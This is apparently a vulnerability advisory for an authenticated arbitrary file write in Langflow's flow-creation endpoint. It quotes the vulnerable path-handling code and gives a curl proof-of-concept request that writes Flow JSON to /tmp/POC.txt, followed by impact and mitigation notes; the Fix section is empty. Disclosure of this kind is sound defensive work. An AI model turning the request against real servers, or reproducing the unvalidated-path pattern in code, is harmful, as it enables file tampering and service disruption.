PT-2025-54699 · Pypi · Langflow

Published: 2025-12-19 · Updated: 2025-12-19

CVSS v3.1: 7.1 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
Vulnerability Overview
If an arbitrary path is supplied in the request body's `fs_path` field, the server serializes the Flow object to JSON and creates or overwrites a file at that path. There is no path restriction, normalization, or allowed-directory enforcement, so absolute paths (e.g., /etc/poc.txt) are used as given.
Vulnerable Code
  1. It receives the request body (`flow`), updates the DB, and then passes it to the file-writing sink.

```python
@router.post("/", response_model=FlowRead, status_code=201)
async def create_flow(
    *,
    session: DbSession,
    flow: FlowCreate,
    current_user: CurrentActiveUser,
):
    try:
        db_flow = await new_flow(session=session, flow=flow, user_id=current_user.id)
        await session.commit()
        await session.refresh(db_flow)

        # sink: the stored flow, carrying the client-supplied fs_path, is written to disk
        await save_flow_to_fs(db_flow)

    except Exception as e:
```

  2. Applies the authentication dependency (an API key or JWT is required) when accessing the endpoint.

```python
from typing import Annotated

from fastapi import Depends

CurrentActiveUser = Annotated[User, Depends(get_current_active_user)]
CurrentActiveMCPUser = Annotated[User, Depends(get_current_active_user_mcp)]
DbSession = Annotated[AsyncSession, Depends(get_session)]
```

  3. The client can directly specify the save path via `fs_path`.

```python
):
    """Create a new flow."""
    try:
        await verify_fs_path(flow.fs_path)  # fs_path is taken straight from the request body
```

  4. It creates the file directly (touching it if it does not already exist) without any path validation.

```python
from anyio import Path  # assumed import: an async Path whose exists()/touch() are awaitable


async def verify_fs_path(path: str | None) -> None:
    if path:
        path = Path(path)
        if not await path.exists():
            await path.touch()  # no normalization and no allowed-root check before creating the file
```

  5. Serializes the Flow object to JSON and writes it to the specified path in "w" mode (overwriting).

```python
from aiofile import async_open  # assumed import: provides the awaitable file object used below


async def save_flow_to_fs(flow: Flow) -> None:
    if flow.fs_path:
        async with async_open(flow.fs_path, "w") as f:  # "w" truncates whatever already exists at fs_path
            try:
                await f.write(flow.model_dump_json())
            except OSError:
                await logger.aexception("Failed to write flow %s to path %s", flow.name, flow.fs_path)
```
PoC Description
When an authenticated user passes an arbitrary path in `fs_path`, the Flow JSON is written to that path. Since /tmp is usually writable, the issue is easy to reproduce there. In a production environment, writes to system-protected directories may fail depending on the permissions of the server process.
PoC
  • Before Exploit: [screenshot]
  • After Exploit:

    ```bash
    curl -sS -X POST "http://localhost:7860/api/v1/flows/" \
      -H "Content-Type: application/json" \
      -H "x-api-key: sk-8Kyzf9IQ-UEJ OtSTaJq4eniMT9 JKgZ7 q8PNkoxc" \
      -d '{"name":"poc-etc","data":{"nodes":[],"edges":[]},"fs_path":"/tmp/POC.txt"}'
    ```

    [screenshot]

Impact

  • Authenticated Arbitrary File Write (within server permission scope): Risk of corrupting configuration/log/task files, disrupting application behavior, and tampering with files read by other components.
  • Both absolute and relative paths are accepted, so a caller can escape any intended base directory. The risk of overwriting system files increases in environments where the server runs as root or with weak mount/permission settings.
  • The file content is limited to Flow JSON, but the impact is severe if the target file is parsed by a JSON parser or is subject to subsequent processing.
  • In production environments, it is essential to enforce a save root, normalize paths, block symlink traversal, and minimize permissions.

Fix


Weakness Enumeration

Related identifiers

GHSA-F43R-CC68-GPX4

Affected products

Langflow